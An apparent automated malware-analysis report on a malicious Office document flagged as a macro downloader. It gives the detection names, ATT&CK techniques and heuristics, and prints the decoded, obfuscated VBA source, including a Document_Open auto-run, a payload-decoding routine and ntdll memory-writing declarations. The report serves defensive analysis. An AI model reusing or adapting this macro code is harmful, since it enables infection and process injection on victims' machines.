MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Office document with a critical heuristic indicating it's a downloader. A VBA macro named 'Document_Open' is present, which is a common technique for executing malicious code upon file opening. The macro code is obfuscated but appears to be designed to download and execute a secondary payload. The presence of VBA macros and the Document_Open subroutine strongly suggests a spearphishing attachment delivery method.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11918 bytes |
SHA-256: 0ebf6e82aab92edf946bc28e62977edaf62d45c80e3b1e1644f1f253b2c229c6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim grias As Long
Dim chessman As Variant
unexerted = "perpendicular"
interdependent
digenesis = 43 + 37
Pmt 0, digenesis, 24000, 48243, 4
End Sub
Attribute VB_Name = "chalcopyrite"
Function baconian(cropper) As String
Dim bootikin As Long
Dim dilettant(63) As Long
Dim picaresco(63) As Long
Dim ostracoda(63) As Long
Dim doohickey As Long
Dim fountainhead() As Byte
Dim firearms(6962) As Byte
Dim fer As Long
Dim balalaika As Integer
Dim dicranaceae As Long
aix = gormandizing
Dim cleareyedsighted As String
electroencephalograph = 54 - 29 + 262119
codeine = 90 - 24 + 3966
chytridiaceae = 53 - 102 + 65329
ahuehuete = 117 - 92 + 230
Dim barm As Long
Dim overweening As String
hypallage = 123 - 66 + 16711623
Dim quakeress As Long
animatism = 31 - 113 + 65618
aphriza = 98 - 5 + 4003
bare = 95 - 87 + 258040
annelid = 77 - 13 + 16515008
archosaur = 9 - 5 + 59
positive = 57 - 83 + 282
greenwich = 21 - 39 + 82
Dim preaching As Byte
details = 27 - 42 + 7858
Dim highly() As Byte
highly = VBA.StrConv(cropper, 120 + 8)
pellaea = 25 + 6
Pmt 0, pellaea, 18816, 37014, 2
Shaded = 7843
congruous = vbKeyShift - 12
For comprehension = 0 To Shaded
If comprehension Mod 2 = 0 Then
highly(comprehension) = highly(comprehension) - congruous
Else
highly(comprehension) = highly(comprehension) - (congruous - 1)
End If
Next comprehension
avo = 30 + 8
Pmt 0, avo, 24836, 46679, 2
balalaika = 0
notissima = topheavy
For fer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
ostracoda(fer) = episodic(fer, greenwich, 38)
picaresco(fer) = episodic(fer, aphriza, 38)
dilettant(fer) = episodic(fer, electroencephalograph, 38)
Next fer
tiu = 58 + 46
Pmt 0, tiu, 14755, 46989, 5
fountainhead = highly
discoglossidae = 28 - 49 + 25
ectoproct = 42 + 36
Pmt 0, ectoproct, 7525, 34551, 6
namely = 91 - 126 + 38
aix = "disproportion"
aix = aix
diaphragm = namely + 1
assyrian = 73 - 50 - 21
For doohickey = 0 To Shaded
nectary = fountainhead(doohickey)
appaloosa = fountainhead(doohickey + 2)
snuffbox = picaresco(notissima(fountainhead(doohickey + 1)))
campylorhynchus = ostracoda(notissima(appaloosa)) + notissima(fountainhead(doohickey + namely))
dicranaceae = dilettant(notissima(nectary)) + snuffbox + campylorhynchus
fer = episodic(dicranaceae, hypallage, 30)
firearms(bootikin) = episodic(fer, animatism, 20)
fer = episodic(dicranaceae, chytridiaceae, 30)
firearms(bootikin + 1) = episodic(fer, positive, 20)
firearms(bootikin + assyrian) = episodic(dicranaceae, ahuehuete, 30)
bootikin = bootikin + assyrian + 1
doohickey = doohickey + 3
Next
baconian = firearms
End Function
Function episodic(supposed, exercitation, multinominal)
If multinominal = (20 + (10 / 2 - 5)) * 1 Then
episodic = supposed \ exercitation
ElseIf multinominal = (30 + (5 - 3) / 2 - 1) * 1 Then
episodic = supposed And exercitation
ElseIf multinominal = (38 + (56 / 7 - 4 * 2)) * 1 Then
episodic = supposed * exercitation
End If
End Function
Attribute VB_Name = "prestriction"
Attribute VB_Base = "0{6F029A80-1718-4C2F-86E3-BC261B49E611}{AE875FA0-DC79-4465-8532-4A546FE52C6F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub contemptuously_Change()
End Sub
Attribute VB_Name = "rModu"
#If (83 - 123 + 440 + 38 - 16 + 278) > ((72 - 22 + 270) - (101 - 75 + 514) * 1) And Not ((1 - 23 + 50) - (127 - 15 - 84)) * 2 < (Win64) Then
Public Declare Function marina _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal dispersion As Any, ByVal draped As Any, ByVal bifurcated As Any, ByVal automated As Any,
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.